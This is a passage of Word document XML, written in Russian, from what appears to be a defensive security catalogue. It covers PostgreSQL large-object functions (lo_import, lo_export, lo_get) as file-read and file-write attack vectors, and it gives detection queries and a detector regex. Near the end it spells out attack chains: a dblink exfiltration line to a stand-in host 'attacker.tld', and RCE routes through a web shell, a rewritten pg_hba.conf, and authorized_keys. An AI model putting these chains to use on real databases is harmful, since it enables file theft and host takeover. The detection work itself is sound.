        <w:t xml:space="preserve">Read-вектор (lo_import + lo_get):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14–17.</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predefined role ИЛИ superuser. До PG 11 — только superuser.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lo_get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> сам по себе доступен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — читает любой LO в текущей БД, если LO уже существует (от чужого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Это даёт побочный вектор: если в кластере уже есть LO с интересным содержимым (бэкапы, импортированные документы) — атакующий читает их без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Путь к файлу должен быть readable для uid postgres.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Write-вектор (lo_export):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14–17.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`pg_write_server_files`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> predefined role ИЛИ superuser. До PG 11 — только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Это другая роль, не путать с `pg_read_server_files`.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Выдаются они независимыми </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — наличие read-роли не открывает write.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выдаётся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ещё реже</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> чем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даже большинство DBA её не имеют. Чаще встречается у backup-операторов и operators-ролей в managed-кластерах (где роль доступна только внутренней инфраструктуре провайдера).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Целевая директория должна быть writable для uid postgres: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (если веб-сервер с тем же uid или мир-writable), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/lib/postgresql/.ssh/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (home postgres-пользователя), иногда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/postgresql/16/main/pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (если postgres — owner конфига; типично для package-based инсталляций Debian/Ubuntu).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Модель привилегий — см. раздел </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (predefined roles).</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от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">application-роли</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — практически всегда атака. Легитимный use case — ETL для бинарных данных (медиа-файлы, документы, экспорт-импорт справочников), только из admin/cron-сессий под выделенной ETL-ролью.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Артефакт в `pg_largeobject_metadata` — главный пост-факт маркер атаки.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Каждый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lo_create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> создаёт запись </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(lomid, lomowner)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Запрос для детекции:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT lomid, lomowner, pg_size_pretty(SUM(octet_length(data)))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_largeobject_metadata m</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN pg_largeobject l ON l.loid = m.lomid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE m.lomowner NOT IN (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT oid FROM pg_roles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE rolname IN ('etl_user', 'media_importer')</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100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GROUP BY lomid, lomowner;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все LO без owner-приложения — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">остаются мусором</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> после атаки. Очищаются только явным </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_unlink(oid)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, что атакующий часто забывает (Payload B по умолчанию не очищает) или не имеет привилегий выполнить (требует owner LO или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Резкий рост числа записей в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_largeobject_metadata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> за короткий период от одной роли — массовый file-read.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Любой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_export(_, '/var/www/...')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'/home/...'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'/etc/...'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'/root/...'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'/tmp/...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — однозначно атака. Легитимный экспорт идёт в выделенные ETL-директории под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-uid (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/lib/postgresql/etl-export/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lo_import('/proc/...')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lo_import('/etc/...')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lo_import('/root/...')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атака; легитимные импорты идут только из ETL-источников.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pg_stat_activity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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, содержащий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_from_bytea</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decode(..., 'base64')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атака; legitimate workflow для бинарных данных использует параметризацию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_put(oid, 0, $1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без хардкода контента в SQL.</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14–17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (механика стабильна с PG 11; до PG 11 — только superuser, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без predefined roles).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обе predefined roles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структурно недоступны на всех major-провайдерах. На AWS RDS — зарезервированы внутренней инфраструктурой, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не выдаются даже `rds_superuser`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; на Google Cloud SQL — аналогично; на Supabase — только service role при custom-конфигурации. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атака на managed-PG нереализуема ни в read-, ни в write-варианте</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — даже read требует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так же как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в 3.6.3. Self-hosted (bare-metal, IaaS-VM, Kubernetes с own-managed PG) — единственная среда. Детальный разбор — см.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как альтернативный read-API: одношаговый, без артефакта в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_largeobject_metadata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Выбор между 3.6.3 и 3.6.4 для read:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> если есть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проще и чище (3.6.3 Payload A/B),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имеет смысл только если планируется последующий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(read + write в одной цепочке) или если атакующий хочет сохранить файл в БД как промежуточное состояние для последующего экспорта.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3.6.1, 3.6.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — chain для эксфильтрации </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lo_get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> результата через OOB-канал, когда HTTP-ответ невидим: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dblink_connect('host=' || encode(lo_get(lo_import(...)), 'hex') || '.attacker.tld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3.7.x RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — chain: (а)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web-shell + HTTP-запрос к веб-серверу с тем же uid; (б)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pg_reload_conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → trust-auth → новый коннект superuser-ом → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY FROM PROGRAM</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authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + SSH → host-level pivot.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — privilege escalation: пути получения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и особенно редкого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lo_get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lo_create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lo_put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lo_from_bytea</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lo_unlink</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app/services/judge/rules.py</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расширить класс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OOB_EXFILTRATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (предложенный в 3.6.1) regex-ом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\b(lo_import|lo_export|lo_get|lo_create|lo_put|lo_from_bytea|lo_unlink)\s*\(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — четвёртая ветка единого detector-а для всей серии 3.6.x. Базовый риск 9, для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 поднять до 10 (write-вектор, RCE-потенциал). В саммари 3.6 — сводный regex со всеми четырьмя ветками: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
